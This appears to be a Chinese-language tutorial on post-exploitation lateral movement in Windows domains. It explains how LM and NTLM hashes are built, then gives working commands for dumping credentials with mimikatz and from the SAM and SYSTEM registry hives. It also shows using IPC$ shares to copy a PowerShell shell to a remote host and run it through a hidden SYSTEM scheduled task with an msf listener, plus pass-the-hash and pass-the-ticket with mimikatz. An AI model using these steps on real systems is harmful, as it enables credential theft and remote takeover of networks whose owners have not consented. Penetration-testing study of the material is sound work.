后渗透——内网横向

内网横向

1 LM/NTML HASH

1.1 哈希加密

Windows通常使用LM哈希和NTML哈希两种方法对用户的明文密码进行加密,在域环境中用户信息存储在ntds.dit中。

在Windows操作系统中哈希的结构通常如下:

username:RID:LM-HASH:NT-HASH

从WIndows vista和WindowsServer2008、个人版WindowsServer2003开始默认禁用了LM-HASH。

LM-HASH限定其明文密码在14位以内,所以将密码设置位14位以上即可停用LM-HASH,此时通过工具抓取到的LMHASH通常为:

ad3b435b51404eead3b435b5140433
#表示LMHASH为空或禁用

1.2 LM-HASH原理

  1. 将明文转换为大写格式。
  2. 将大写的字符串转换为16进制。
  3. 密码不足14字节的用00在低位补全。1Byte=8bit
  4. 从中间分开成两组,每组7字节。
  5. 将每一组7字节的16进制转换为2进制,每7bit分成1组并在末尾加0,再转换成16进制,得到2组8字节码。
  6. 将2组编码分别做DES加密,key为字符串KGS!@#$%
  7. 2组加密后的编码合成为最终结果。

1.3 NTLM-HASH原理

  1. 将明文口令转换成16进制格式。
  2. 将转换后的编码转换成Unicode格式,即在每个字节后添加0x00。
  3. 对Unicode字符串作MD4加密,生成32为的16进制数字串,即为结果。

2 HASH抓取

2.1 getpass

Gitee下载

2.2 pwdump

官网下载(Windows PWDUMP tools (openwall.com))

需要使用管理员权限运行

2.3 mimikatz

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security

#提升权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords

#导出SAM数据
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

#使用mimikatz提取hash
lsadump::sam /sam:SAM /system:SYSTEM

[参考后渗透]Mimikatz使用大全 - 肖洋肖恩、 - 博客园 (cnblogs.com)

3 IPC$横向

IPC(Internet Process Connection)共享命名管道的资源,为实现进程间通信而开放的。可通过验证用户名密码的方式获得相应的权限。

3.1 建立一个IPC$

net use \\192.168.41.99(这其实是同域内OA的IP)\ipc$ "密码" /user:administrator
#开启连接
net use

3.2 IPC$利用条件

  • 被访问的主机开启了139、445端口
  • 管理员开启了默认共享

3.3 利用方式

前提:执行net use成功

  • dir

    #查看目标机的指定路径
dir \\192.168.41.99\C$

  • tasklist

    #查看目标机的进程
tasklist /s 192.168.41.99

  • -schtasks

    #查看时间信息(方便开启计划任务)
net time \\192.168.41.99
#复制文件
copy 本地文件 远端文件
copy c:\shell.ps1 \\192.168.41.99\C$
#查看目标机的路径下是否有上传的文件
dir \\192.168.41.99\C$

    #创建计划任务
schtasks /create /s 192.168.41.99 /tn test /sc onstart /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -ExecutionPolicy Bypass -NoExit -File C:\Users\Administrator\Desktop\keep\shell.ps1" /ru system /f

    #执行计划任务
schtasks /run /s IP地址 /i /tn "计划任务名"

  • 用Kali开启msf监听即可

清除任务

#清除计划任务
schtasks /delete /s 192.168.41.99 /tn "test" /f
#清除软连接
net use \\192.168.41.99 /del /y

4 HASH和票据传递

4.1 PTH攻击(Pass The Hash)

首先获取用户名和密码的NTLM值,同时需要有本地管理员权限。

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:hack.com
/ntlm:33b89cf1674c1378a9cbf91de7189a7c"

4.2 票据传递PTT(Pass The Ticket)

  • 获取票据文件

    mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

  • 清除内存中的票据

    kerberos::pruge

  • 将高权限的票据文件注入内存

    mimikatz.exe "kerberos::ptt" "票据文件全名含路径"
#举例:
mimikatz.exe "kerberos::ptt" "[0;804ad]2060a10000Administrator@
krbtgtHACK.
COM.kirbi"